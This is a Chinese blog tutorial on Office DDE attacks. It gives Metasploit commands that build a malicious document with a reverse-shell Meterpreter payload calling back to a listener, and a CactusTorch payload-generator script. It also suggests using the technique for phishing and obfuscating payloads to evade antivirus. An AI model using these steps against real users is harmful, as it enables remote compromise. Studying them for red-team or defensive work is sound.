DDE攻击利用介绍

于 2024-02-20 17:12:53 发布
阅读量381 收藏 7
点赞数 11
文章标签: DDE攻击 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Fly_hps/article/details/136194619
版权
基本介绍

2017年10月SensePost发布了一篇文章并在其中解释了如何在不使用任何宏或脚本的情况下从Microsoft Word文档中执行任意代码,SensePost描述的技术是利用合法的Microsoft Office功能,该功能称为DDE(动态数据交换),DDE旨在允许Microsoft办公应用程序之间传输数据,由于此技术不会使用电子邮件网关可以检测到的恶意宏感染Word文档,因此可以实现与远程代码执行相同的结果,这种攻击非常有效且被广泛用于恶意软件活动和红队评估

利用方式
Metasploit

MSF框架中提供了对DDE漏洞的利用模块,我们可以直接使用该模块生成有效载荷并将其投放给受害者用户诱导其点击运行


msf6 > use exploit/windows/fileformat/office_dde_delivery
[*] Using configured payload windows/meterpreter/reverse_tcp
msf6 exploit(windows/fileformat/office_dde_delivery) > show options
msf6 exploit(windows/fileformat/office_dde_delivery) > set SRVHOST 192.168.204.135
SRVHOST => 192.168.204.135
msf6 exploit(windows/fileformat/office_dde_delivery) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/fileformat/office_dde_delivery) > set LHOST 192.168.204.135
LHOST => 192.168.204.135
msf6 exploit(windows/fileformat/office_dde_delivery) > show options

诱导目标用户打开文件

随后返回一个meterpreter会话

操作会话执行命令:

CactusTorch

William Genovese开发了一个名为CactusTorch DDE Auto的bash脚本,它利用CactusTorch工具生成有效负载并利用Metasploit框架配置来接收连接的侦听器

项目地址:https://github.com/xillwillx/CACTUSTORCH_DDEAUTO

使用方法:

chmod +x cactus.sh
./cactus.sh

CactusTorch DDE Auto可以生成JS、VBS和HTA格式的有效载荷

构造word文档

随后我们便可以收到会话

切换进入session执行各类命令:

文末总结

本篇文章主要介绍了DDE以及其漏洞的利用方式和思路,在进行红队安全评估时我们可以通过DDE来实施社工钓鱼等方式进行利用,不过值得一提的是目前很多的防病毒公司正在尝试检测DDE攻击,因此对于构建具有更高可能性逃避检测并在网络中建立初始足迹的有效载荷而言,混淆是必要的

FLy_鹏程万里
关注
  • 11
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
利用PowerShell Empire实现Word文档DDE攻击控制(简单没啥用)
墨痕诉清风的博客
04-09 451
近期,有安全人员发现了一种DynamicData Exchange (DDE)协议绕过MSWord和MSExcel宏限制,不需使用MSWord和MSExcel漏洞,就能实现在Office文档中执行恶意命令目的。在这篇文章中,我将展示如何利用基于Empire的PowerShell来对Word文档进行“伪装”攻击,可能还有其它实现方法,我仅作个抛砖引玉。 创建Empire Listener 创建一个Empire Listener监听线程,可点此查看Empire的使用说明。 当监听线程启动运行之后,运行
Windows下实现网络DDE通讯
02-26
动 态 数 据 交 换( D y a n m i e D a t a E x e h a n g e , 简 称 D D )E 是 Window s操 作 系 统 所 支 持 的 一 种 内部 进 程 通 信 机制 。 相 对于 Window s提供 的其它 两种 内部 通信机制 ( 剪 ...
鱼叉钓鱼:利用 Office 文档进行 DDE 攻击
weixin_45575473的博客
04-20 533
鱼叉钓鱼:利用 Office 文档进行 DDE 攻击 DDE DDE 是一个自定义字段,用户可插入文档。这些字段允许用户输入简单的说明,包括插入到新文档中的数据及插入位置。攻击者可以创建包含DDE字段的恶意Word文件(而不需要打开另一个Office应用程序)、打开命令提示符和运行恶意代码。 通常情况下,Office应用程序会显示两项告警内容。第一个是关于包含指向其他文件的链接的文档告警,第二个是关于打开远程命令提示符的错误告警。 在MSWord和MSExcel里,我们可以使用DDE来执行命令。 DDE
ms office DDE攻击与防御
09-17
动态数据交换(DDE),它是在Microsoft Windows操作系统中实现的客户端/服务器通信方法,自1987年早期的Windows 2.0基于Windows Messaging,并使用其功能来启动双方之间的连接,服务器侦听某些主题和消息,对其进行响应到客户端并终止连接。 它被用于向诸如办公产品和浏览器的应用程序发送参数,发送命令到shell -explorer-来创建开始菜单组和链接,并在不同的应用程序和服务之间进行集成。 Microsoft将DDE定义为允许应用程序共享数据的一组消息和准则。Microsoft文档说明,应用程序可以使用DDE协议进行一次数据传输,以便应用程序在新数据可用时将更新发送给彼此。
使用Office进行DDE攻击
Sven的忘却日记
06-13 1955
当你打开恶意docx文件时,会有提示信息,不过通过解析路径的手段,把可疑部分隐藏了。 这个提示信息,看起来是启动我Word安装目录下的一个程序,普通人觉得,Word启动它自己目录下的程序,应该很正常呀!于是就点了是 此时用procexp查看进程列表,恶意的代码已经执行了~ 如果用7z来打开这个docx文件,可以看到里面的footer.xml文件中包含的恶意部分 DDEAUTO "C:\\P...
【安全】【测试思路】文件上传下载之绕过上传时内容校验的DDE注入攻击
次次次不吃饼干_的博客
07-28 1448
【安全】【测试思路】文件上传下载之基于bypass的DDE注入攻击DDE注入介绍测试流程图测试思路服务器搭建攻击脚本参考上传文件准备 DDE注入介绍   DDE(Dynamic Data Exchange,动态数据交换)是应用之间传输数据的一种方法。Excel可以使用这种机制,根据外部应用的处理结果来更新单元格的内容。因此,如果我们制作包含(恶意)DDE公式的xlsx/csv文件,那么在打开该文件时,Excel就会尝试执行外部应用,以达到攻击的目的。 测试流程图 测试思路 服务器搭建   在这里,咱们可以使
java程序拦截dde漏洞问题_勒索病毒又更新 Office DDE漏洞被利用
weixin_33186395的博客
03-01 345
勒索软件已见怪不怪了,下半年每天都有新的勒索软件出现,中毒电脑文件被高强度加密,能恢复的极为罕见,受害用户损失惨重。勒索病毒的攻击手法也无所不用其极,本周末,金山毒霸安全实验室再次截获最新的勒索软件,该病毒利用Office DDE漏洞(Microsoft动态数据交换),极具伪装性、欺骗性,用户点错对话框会立刻导致电脑文件被加密。病毒最初来源于不法分子精心伪造的电子邮件,如果收件人粗心大意,下载点击...
java程序拦截dde漏洞问题_Office DDE漏洞学习笔记
weixin_42515512的博客
03-01 622
1、前言2017年下半年爆发出来的Office漏洞,一直没有空做笔记记录。在病毒分析中也看到有利用这个漏洞的样本,针对Office系列软件发起的钓鱼攻击和APT攻击一直是安全攻防的热点。2、office DDEMicrosoft Office Word 的一个执行任意代码的方法,可以在不启用宏的情况下执行任意程序。这个功能的本意是为了更方便地在 word 里同步更新其它应用的内容,比如说在一个 w...
C语言头文件 DDE.H
06-11
C语言头文件 DDE.HC语言头文件 DDE.HC语言头文件 DDE.HC语言头文件 DDE.HC语言头文件 DDE.HC语言头文件 DDE.HC语言头文件 DDE.HC语言头文件 DDE.HC语言头文件 DDE.HC语言头文件 DDE.HC语言头文件 DDE.HC语言头文件 ...
C语言头文件 DDE.RH
06-11
C语言头文件 DDE.RHC语言头文件 DDE.RHC语言头文件 DDE.RHC语言头文件 DDE.RHC语言头文件 DDE.RHC语言头文件 DDE.RHC语言头文件 DDE.RHC语言头文件 DDE.RHC语言头文件 DDE.RHC语言头文件 DDE.RHC语言头文件 DDE.RHC...
DDE服务模块.rar
04-04
DDE服务模块.rar
软考-考生常见操作说明-202405101400-纯图版.pdf
05-14
软考官网--2024常见操作说明:包括如何绘制网络图、UML图、表格等 模拟作答系统是计算机技术与软件专业技术资格(水平)考试的电子化考试系统界面、作答过程的仿真系统,为各级别、各资格涉及输入和页面显示的部分题型提供体验性练习。
setuptools-34.0.3.zip
最新发布
05-14
Node.js,简称Node,是一个开源且跨平台的JavaScript运行时环境,它允许在浏览器外运行JavaScript代码。Node.js于2009年由Ryan Dahl创立,旨在创建高性能的Web服务器和网络应用程序。它基于Google Chrome的V8 JavaScript引擎,可以在Windows、Linux、Unix、Mac OS X等操作系统上运行。 Node.js的特点之一是事件驱动和非阻塞I/O模型,这使得它非常适合处理大量并发连接,从而在构建实时应用程序如在线游戏、聊天应用以及实时通讯服务时表现卓越。此外,Node.js使用了模块化的架构,通过npm(Node package manager,Node包管理器),社区成员可以共享和复用代码,极大地促进了Node.js生态系统的发展和扩张。 Node.js不仅用于服务器端开发。随着技术的发展,它也被用于构建工具链、开发桌面应用程序、物联网设备等。Node.js能够处理文件系统、操作数据库、处理网络请求等,因此,开发者可以用JavaScript编写全栈应用程序,这一点大大提高了开发效率和便捷性。 在实践中,许多大型企业和组织已经采用Node.js作为其Web应用程序的开发平台,如Netflix、PayPal和Walmart等。它们利用Node.js提高了应用性能,简化了开发流程,并且能更快地响应市场需求。
基于遗传优化GA的三目标优化仿真【包括程序,注释,操作步骤】
05-14
1.版本:matlab2022A。 2.包含:程序,中文注释,仿真操作步骤(使用windows media player播放)。 3.领域:遗传优化 4.仿真效果:仿真效果可以参考博客同名文章《基于遗传优化GA的三目标优化仿真》 5.内容:基于遗传优化GA的三目标优化仿真。遗传算法(Genetic Algorithm, GA)是一种模拟自然选择和遗传机制的全局搜索优化方法,广泛应用于解决复杂优化问题,包括具有多个目标的优化问题,即多目标遗传算法(Multi-Objective Genetic Algorithm, MOGA)。在这里,将三个目标函数进行统一的编码,通过单目标遗传优化的方式,同步求解三个目标函数的最优值。 6.注意事项:注意MATLAB左侧当前文件夹路径,必须是程序所在文件夹位置,具体可以参考视频录。
基于单通道脑电信号的自动睡眠分期研究.zip
05-14
本项目使用了Sleep-EDF公开数据集的SC数据进行实验,一共153条整晚的睡眠记录,使用Fpz-Cz通道,采样频率为100Hz 整套代码写的较为简洁,而且有添加相应的注释,因此进行分享,而且不仅仅说是睡眠分期,也可以作为学习如何使用神经网络去进行时序数据分类问题的一个入门项目,包括怎么用GRU、LSTM和Attention这些经典网络结构。 网络结构(具体可查看network.py文件): 网络整体结构类似于TinySleepNet,对RNN部分进行了修改,增加了双向RNN、GRU、Attention等网络结构,可根据参数进行调整选择。 定义了seq_len参数,可以更灵活地调整batch_size与seq_len。 数据集加载(具体可查看dataset.py文件) 直接继承自torch的Dataset,并定义了seq_len和shuffle_seed,方便调整输入,并复现实验。 训练(具体可查看train.py文件):
setuptools-27.3.1.tar.gz
05-14
Node.js,简称Node,是一个开源且跨平台的JavaScript运行时环境,它允许在浏览器外运行JavaScript代码。Node.js于2009年由Ryan Dahl创立,旨在创建高性能的Web服务器和网络应用程序。它基于Google Chrome的V8 JavaScript引擎,可以在Windows、Linux、Unix、Mac OS X等操作系统上运行。 Node.js的特点之一是事件驱动和非阻塞I/O模型,这使得它非常适合处理大量并发连接,从而在构建实时应用程序如在线游戏、聊天应用以及实时通讯服务时表现卓越。此外,Node.js使用了模块化的架构,通过npm(Node package manager,Node包管理器),社区成员可以共享和复用代码,极大地促进了Node.js生态系统的发展和扩张。 Node.js不仅用于服务器端开发。随着技术的发展,它也被用于构建工具链、开发桌面应用程序、物联网设备等。Node.js能够处理文件系统、操作数据库、处理网络请求等,因此,开发者可以用JavaScript编写全栈应用程序,这一点大大提高了开发效率和便捷性。 在实践中,许多大型企业和组织已经采用Node.js作为其Web应用程序的开发平台,如Netflix、PayPal和Walmart等。它们利用Node.js提高了应用性能,简化了开发流程,并且能更快地响应市场需求。
setuptools-12.0-py2.py3-none-any.whl
05-14
Node.js,简称Node,是一个开源且跨平台的JavaScript运行时环境,它允许在浏览器外运行JavaScript代码。Node.js于2009年由Ryan Dahl创立,旨在创建高性能的Web服务器和网络应用程序。它基于Google Chrome的V8 JavaScript引擎,可以在Windows、Linux、Unix、Mac OS X等操作系统上运行。 Node.js的特点之一是事件驱动和非阻塞I/O模型,这使得它非常适合处理大量并发连接,从而在构建实时应用程序如在线游戏、聊天应用以及实时通讯服务时表现卓越。此外,Node.js使用了模块化的架构,通过npm(Node package manager,Node包管理器),社区成员可以共享和复用代码,极大地促进了Node.js生态系统的发展和扩张。 Node.js不仅用于服务器端开发。随着技术的发展,它也被用于构建工具链、开发桌面应用程序、物联网设备等。Node.js能够处理文件系统、操作数据库、处理网络请求等,因此,开发者可以用JavaScript编写全栈应用程序,这一点大大提高了开发效率和便捷性。 在实践中,许多大型企业和组织已经采用Node.js作为其Web应用程序的开发平台,如Netflix、PayPal和Walmart等。它们利用Node.js提高了应用性能,简化了开发流程,并且能更快地响应市场需求。
dde matlab
02-27
DDE (Dynamic Data Exchange) 是一种用于在不同应用程序之间进行数据交换的通信协议。而 MATLAB 是一强大的数值计算和科学程软件,它提供了丰富的数学函数库和工具箱,用于解决各种数学和工程问题。 在 MATLAB 中,你可以使用 DDE 功能来与其他支持 DDE 协议的应用程序进行通信。通过 DDE,你可以在 MATLAB 中发送命令和数据给其他应用程序,并接收来自其他应用程序的响应和数据。 使用 MATLAB 的 DDE 功能,你可以实现以下操作: 1. 与其他应用程序建立 DDE 连接。 2. 发送命令和数据给其他应用程序。 3. 接收其他应用程序发送的响应和数据。 要使用 MATLAB 的 DDE 功能,你需要了解以下几个重要的函数: 1. `ddeinit`:用于建立与其他应用程序的 DDE 连接。 2. `ddeexec`:用于发送命令给其他应用程序。 3. `ddereq`:用于发送请求并接收其他应用程序的响应。 4. `ddeterm`:用于终止与其他应用程序的 DDE 连接。 需要注意的是,DDE 功能在最新版本的 MATLAB 中已经不再推荐使用,而是推荐使用更现代化的通信方式,如 COM、NET、Java 等。因此,如果你需要进行应用程序之间的数据交换,建议使用更适合的通信方式。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

FLy_鹏程万里

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值